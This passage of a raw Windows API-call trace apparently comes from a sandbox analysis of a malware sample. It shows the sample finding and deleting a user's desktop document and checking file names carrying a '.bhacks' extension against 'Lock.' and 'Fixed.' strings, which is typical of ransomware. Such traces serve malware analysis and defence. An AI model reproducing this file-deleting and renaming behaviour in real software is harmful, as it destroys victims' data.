hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75948 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6418 | out: hHeap=0x2af0000) returned 1 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0106.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0106.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0106.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0106.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0106.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0106.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0106.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eaa28 [0106.681] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/vY9PyxRY3.odp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\vY9PyxRY3.odp", lpFilePart=0x8cedf4*="vY9PyxRY3.odp") returned 0x25 [0106.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaa28 | out: hHeap=0x2af0000) returned 1 [0106.681] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\vY9PyxRY3.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\vy9pyxry3.odp")) returned 0x20 [0106.681] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\vY9PyxRY3.odp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 0x9a3b80 [0106.681] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\vY9PyxRY3.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\vy9pyxry3.odp")) returned 1 [0106.727] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 0 [0106.728] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0106.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75948 | out: hHeap=0x2af0000) returned 1 [0106.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0106.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0106.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0106.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0106.728] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0106.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0106.728] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0106.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0106.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0106.729] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0106.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0106.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0106.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0106.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75240 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0106.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eb058 [0106.729] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/vY9PyxRY3.odp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\vY9PyxRY3.odp", lpFilePart=0x8cf650*="vY9PyxRY3.odp") returned 0x25 [0106.729] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\vY9PyxRY3.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\vy9pyxry3.odp")) returned 0xffffffff [0106.730] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.730] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.730] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0106.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0106.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0106.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0106.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0106.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0106.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0106.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nCKPmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CKPmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KPmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZd6_T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zd6_T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d6_T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yGD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GD3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CRn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rn.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n.jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0106.731] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0106.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nCKPmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CKPmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KPmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PmZd6_T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZd6_T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zd6_T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d6_T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yGD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GD3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CRn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rn.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n.jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0106.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0106.732] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0106.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0106.732] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0106.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0106.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0106.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0106.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0106.733] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0106.733] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63a8 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0106.733] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.733] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6098 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0106.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0106.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0106.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0106.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0106.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0106.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0106.734] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0106.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0106.734] 